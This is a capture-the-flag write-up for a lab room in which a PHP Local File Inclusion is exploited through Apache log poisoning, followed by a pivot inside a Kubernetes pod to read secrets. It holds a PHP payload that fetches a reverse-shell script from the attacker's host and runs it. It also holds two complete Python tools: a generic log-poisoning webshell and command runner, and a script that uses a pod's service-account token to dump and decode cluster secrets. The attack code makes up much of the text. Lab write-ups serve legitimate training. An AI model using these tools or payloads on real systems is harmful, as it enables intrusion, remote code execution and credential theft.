Description
Room Link: Island Orchestration
Only one flag to catch … !
Recon
Using nmap, we can find that there are two open ports.
Nmap scan report for 10.10.160.23
Host is up, received reset ttl 255 (0.013s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
Port 80
We have a PHP webapp on port 80
It seems that we are dealing with a Local File Inclusion (LFI) vulnerability. LFI vulnerabilities allow an attacker to make the application include local files from the target system in its HTTP responses and so read their contents. There are many resources available online that can help with identifying and exploiting LFI vulnerabilities.
To get a reverse shell on this web application, we can try including the Apache2 access_log or access.log file. I actually ended up finding the location of this file by reading /proc/self/fd/6 through the LFI. This works because with mod_php the PHP code runs inside the Apache worker process itself, so /proc/self/fd/ lists the worker's open file descriptors, log files included, even when the log path is unknown or not readable by name.
I injected a payload into the User-Agent value, which Apache writes verbatim into the access log. Some PHP web applications use functions such as file_get_contents or fopen to include/read external files, but these functions only return the file's bytes and do not execute PHP code. Only functions like include, require, include_once, and require_once can execute PHP code, so log poisoning only turns into code execution if the vulnerable parameter ends up in one of those.
Anyway, it seems that we have successfully gained Remote Code Execution (RCE).
To get a reverse shell, I injected this payload, which downloads s.sh (the script holding the reverse shell) from a web server on my attacking machine at 10.8.48.23:8001 and runs it with bash:
<?php file_put_contents('/tmp/s.sh',file_get_contents('http://10.8.48.23:8001/s.sh'),FILE_APPEND);system('bash /tmp/s.sh');?>
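The log-poisoning chain described above (locate the access log through /proc/self/fd, write PHP into it via the User-Agent header, then include the log with a cmd parameter), as an added Python example that is not the room's or the author's code. It assumes the vulnerable parameter is called page on index.php (hypothetical, the writeup does not name it) and that the file is pulled in with include(); it uses only the standard library, so it runs from the attacking machine:

```python
#!/usr/bin/env python3
"""Log poisoning through an LFI (added example, not the room's code).

Assumptions, both hypothetical: the vulnerable parameter is `page` and the
target passes it to include()/require(). Standard library only.
"""
import re
import sys
import urllib.parse
import urllib.request
from typing import Callable, Optional

# Apache's combined log format quotes the request line, e.g. "GET / HTTP/1.1".
_ACCESS_LOG_RE = re.compile(r'"(?:GET|POST|HEAD) \S* HTTP/1\.[01]"')

# Single quotes only: Apache logs a literal `"` inside User-Agent as `\"`,
# which would turn into a PHP parse error once the log is include()d.
WEBSHELL = "<?php system($_GET['cmd']); ?>"
BEGIN, END = "__OUT_BEGIN__", "__OUT_END__"


def looks_like_access_log(body: str) -> bool:
    """True if the LFI response contains at least one access-log request line."""
    return _ACCESS_LOG_RE.search(body) is not None


def find_log_fd(fetch: Callable[[str], str], max_fd: int = 32) -> Optional[int]:
    """Walk /proc/self/fd/N through the LFI until the access log comes back.

    `fetch(path)` returns whatever the LFI serves for `path`; injecting it
    keeps this testable without a target (a fake fetch in the test).
    """
    for fd in range(max_fd):
        try:
            body = fetch(f"/proc/self/fd/{fd}")
        except OSError:  # URLError/HTTPError are OSError subclasses
            continue
        if looks_like_access_log(body):
            return fd
    return None


def extract_output(body: str, begin: str = BEGIN, end: str = END) -> Optional[str]:
    """Cut the command output out of the rest of the log that include() echoes.

    The first marker pair is the right one: the poisoned line sits before
    any later request lines that carry the markers in their URL.
    """
    start = body.find(begin)
    if start < 0:
        return None
    start += len(begin)
    stop = body.find(end, start)
    if stop < 0:
        return None
    return body[start:stop].strip()


def make_fetch(base_url: str, param: str = "page",
               extra: Optional[dict] = None) -> Callable[[str], str]:
    """Build fetch(path) that requests base_url?param=path (plus extra query keys)."""
    def fetch(path: str) -> str:
        query = {param: path, **(extra or {})}
        url = f"{base_url}?{urllib.parse.urlencode(query)}"
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return fetch


def poison(base_url: str, php: str = WEBSHELL) -> None:
    """Write `php` into the access log via User-Agent. Do this ONCE: every
    poisoned line is parsed on each include, and a single syntax error
    anywhere in the file breaks all of them."""
    req = urllib.request.Request(base_url, headers={"User-Agent": php})
    with urllib.request.urlopen(req, timeout=10) as resp:
        resp.read()


def run_cmd(base_url: str, log_path: str, cmd: str, param: str = "page") -> Optional[str]:
    """Include the poisoned log with ?cmd=... and return only the command output."""
    wrapped = f"echo {BEGIN}; {cmd}; echo {END}"
    body = make_fetch(base_url, param, {"cmd": wrapped})(log_path)
    return extract_output(body)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://TARGET/index.php 'id'")
    target, command = sys.argv[1], sys.argv[2]
    fd = find_log_fd(make_fetch(target))
    if fd is None:
        sys.exit("no access log found under /proc/self/fd/0..31")
    log_path = f"/proc/self/fd/{fd}"
    print(f"[+] access log readable as {log_path}")
    poison(target)
    print(run_cmd(target, log_path, command))
```

Usage from the attacking box would be python3 lfi_poison.py http://10.10.160.23/index.php 'id' (index.php is the assumed script). The begin/end markers exist because include() echoes the whole log around the command output, and the fd walk is done before poisoning so the probe requests never contain PHP.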
I wasn’t able to find some Linux binaries such as ifconfig, curl …
I immediately suspected that we were inside a Docker container or a similar environment. In such cases, I often use a repository of Linux static binaries that I have collected linux-static-binaries.
So let’s upload ifconfig and see what we have here.
It looks like our suspicion was correct and we are indeed inside a Docker container. To see if there are any other containers on the system, we can scan the Docker bridge network (172.17.0.0/16 by default; a /24 is enough here) with this nmap static binary nmap-static-binaries.
After uploading it (note that as an unprivileged user nmap falls back to a TCP connect scan, which is why the reasons below read conn-refused/syn-ack rather than reset):
./nmap 172.17.0.0/24 -vvv
output:
Nmap scan report for ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1)
Host is up, received conn-refused (0.00027s latency).
Scanned at 2022-06-25 15:38:09 UTC for 4s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
8443/tcp open https-alt syn-ack
30000/tcp filtered ndmps no-response
Nmap scan report for coredns-78fcd69978-ttkch (172.17.0.2)
Host is up, received conn-refused (0.00029s latency).
Scanned at 2022-06-25 15:38:09 UTC for 3s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
8080/tcp open http-proxy syn-ack
8181/tcp open intermapper syn-ack
Nmap scan report for islands-7655b7749f-zvq52 (172.17.0.3)
Host is up, received syn-ack (0.00030s latency).
Scanned at 2022-06-25 15:38:09 UTC for 3s
Not shown: 999 closed ports
Reason: 999 conn-refused
PORT STATE SERVICE REASON
80/tcp open http syn-ack
There are three hosts. 172.17.0.3 (islands-7655b7749f-zvq52, only port 80) is almost certainly the pod we are sitting in.
172.17.0.1
This is the bridge gateway, i.e. the host itself (nmap even resolves it to an EC2 internal hostname). The default top-1000 scan only showed 22, 8443 and a filtered 30000, so it is worth scanning all ports: 10250 (kubelet API), 10249 and 10256 (kube-proxy metrics and health check) and 2376 (Docker daemon over TLS) make it look like a Kubernetes node, with 8443 most likely the API server (the port minikube uses) and 30000 sitting at the bottom of the NodePort range.
./nmap 172.17.0.1 -p- -vvv
Host is up, received conn-refused (0.00013s latency).
Scanned at 2022-06-25 15:39:27 UTC for 3s
Not shown: 65528 closed ports
Reason: 65528 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
2376/tcp open docker syn-ack
8443/tcp open https-alt syn-ack
10249/tcp open unknown syn-ack
10250/tcp open unknown syn-ack
10256/tcp open unknown syn-ack
30000/tcp filtered ndmps no-response
172.17.0.2
I didn’t know what this host was doing … In hindsight the scan already says it: the reverse name coredns-78fcd69978-ttkch is a pod name, and the port set (53 DNS, 8080 health, 8181 readiness, 9153 Prometheus metrics) is exactly CoreDNS, the cluster DNS. There is nothing to attack here, but it confirms a Kubernetes cluster and that our container sits on the same bridge as its pods.
./nmap -sC -sV 172.17.0.2 -p- -vvv
Host is up, received conn-refused (0.00013s latency).
Scanned at 2022-06-25 15:38:54 UTC for 16s
Not shown: 65531 closed ports
Reason: 65531 conn-refused
PORT STATE SERVICE REASON VERSION
53/tcp open tcpwrapped syn-ack
8080/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
8181/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9153/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Kubernetes
One of the first things I usually do is download kubectl, which is the command-line tool for controlling Kubernetes clusters. If curl is missing in the container, as it was here, fetch it on the attacking machine and upload it like the other static binaries:
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
Let’s try to list pods
./kubectl get pods
It seems that the user does not have the necessary permissions to list pods. Note who "the user" is here: with no kubeconfig, kubectl inside a pod falls back to the in-cluster configuration, the API server address from KUBERNETES_SERVICE_HOST/KUBERNETES_SERVICE_PORT and the service-account token mounted under /var/run/secrets/kubernetes.io/serviceaccount, so every command runs with that service account's RBAC rights. Let’s inspect the authorization first.
We can use the following command to see what our current identity (the pod's service account) is authorized to do in the current namespace
./kubectl auth can-i --list
There is a resource called secrets that we are allowed to read. Secrets in Kubernetes are objects that contain sensitive data, such as passwords, OAuth tokens, and SSH keys. By listing the secrets resource, we may find information that is useful for accessing other resources or escalating privileges. Keep in mind that auth can-i --list is evaluated for the current namespace only; rights in other namespaces have to be checked with -n.
./kubectl get secrets
It seems that we are making progress and getting closer to finding the flag …
./kubectl describe secrets/flag
Flag
./kubectl get secret flag -o=json
describe deliberately prints only the size of each value; get -o json prints the data map with every value base64-encoded, so we obtain the flag by base64 decoding the value (base64 -d).
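What kubectl auth can-i --list and kubectl get secret -o json did above, done directly against the API server with the pod's mounted service-account token, as an added example that is not the room's or the author's code. It assumes python3 is available in the pod, which was not verified here (the writeup uploads static binaries because curl is missing), and the standard in-pod layout: KUBERNETES_SERVICE_HOST/KUBERNETES_SERVICE_PORT in the environment and token, ca.crt and namespace under /var/run/secrets/kubernetes.io/serviceaccount. The SelfSubjectRulesReview it posts is the request can-i --list sends, and the in_pod check doubles as a quick "is this a Kubernetes pod?" test instead of guessing from missing binaries:

```python
#!/usr/bin/env python3
"""Enumerate RBAC rights and dump readable secrets from inside a pod, stdlib only.

Added example for this writeup, not the room's code. Assumes python3 in the
pod and the standard in-pod layout (service-account files + KUBERNETES_* env).
"""
import base64
import json
import os
import ssl
import sys
import urllib.request
from typing import Dict, List, Optional

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"


def in_pod() -> bool:
    """Are we inside a Kubernetes pod? Token mounted and API env present."""
    return os.path.isfile(f"{SA_DIR}/token") and "KUBERNETES_SERVICE_HOST" in os.environ


def api_call(path: str, body: Optional[dict] = None) -> dict:
    """GET (or POST when body is given) against the in-cluster API server,
    authenticated with the pod's token and verifying the cluster CA."""
    host = os.environ["KUBERNETES_SERVICE_HOST"]
    port = os.environ.get("KUBERNETES_SERVICE_PORT", "443")
    with open(f"{SA_DIR}/token") as f:
        token = f.read().strip()
    ctx = ssl.create_default_context(cafile=f"{SA_DIR}/ca.crt")
    data = None if body is None else json.dumps(body).encode()
    req = urllib.request.Request(
        f"https://{host}:{port}{path}", data=data,
        method="GET" if data is None else "POST",
        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return json.load(resp)


def rules_review(namespace: str) -> dict:
    """The request `kubectl auth can-i --list` makes: a SelfSubjectRulesReview."""
    return api_call("/apis/authorization.k8s.io/v1/selfsubjectrulesreviews", {
        "apiVersion": "authorization.k8s.io/v1", "kind": "SelfSubjectRulesReview",
        "spec": {"namespace": namespace},
    })


def summarize_rules(review: dict) -> List[str]:
    """Flatten resourceRules into 'verbs  group/resource' lines."""
    lines = []
    for rule in review.get("status", {}).get("resourceRules", []):
        groups = rule.get("apiGroups") or [""]
        res = ",".join(f"{g}/{r}" if g else r
                       for g in groups for r in rule.get("resources", []))
        lines.append(f"{','.join(rule.get('verbs', []))}  {res}")
    return lines


def can_read_secrets(review: dict) -> bool:
    """True if some rule grants get or list on core-group secrets (wildcards count)."""
    for rule in review.get("status", {}).get("resourceRules", []):
        groups = set(rule.get("apiGroups") or [""])
        resources = set(rule.get("resources", []))
        verbs = set(rule.get("verbs", []))
        if groups & {"", "*"} and resources & {"secrets", "*"} and verbs & {"get", "list", "*"}:
            return True
    return False


def decode_secret(secret: dict) -> Dict[str, str]:
    """A Secret's .data values are base64 (what `-o json` shows); return them decoded."""
    return {k: base64.b64decode(v).decode("utf-8", errors="replace")
            for k, v in secret.get("data", {}).items()}


def main() -> None:
    if not in_pod():
        sys.exit("no service-account token / KUBERNETES_SERVICE_HOST: not inside a pod")
    with open(f"{SA_DIR}/namespace") as f:
        ns = f.read().strip()
    review = rules_review(ns)
    print("\n".join(summarize_rules(review)) or "(no rules)")
    if not can_read_secrets(review):
        sys.exit(f"service account cannot read secrets in namespace {ns}")
    for item in api_call(f"/api/v1/namespaces/{ns}/secrets").get("items", []):
        for key, value in decode_secret(item).items():
            print(f"{item['metadata']['name']}/{key}: {value}")


if __name__ == "__main__":
    main()
```

Run it as python3 k8s_enum.py inside the pod. It stops early when the review shows no get/list on secrets, which is the same answer can-i --list gave the author; a token with rights only in another namespace would need the review and the secrets URL pointed at that namespace.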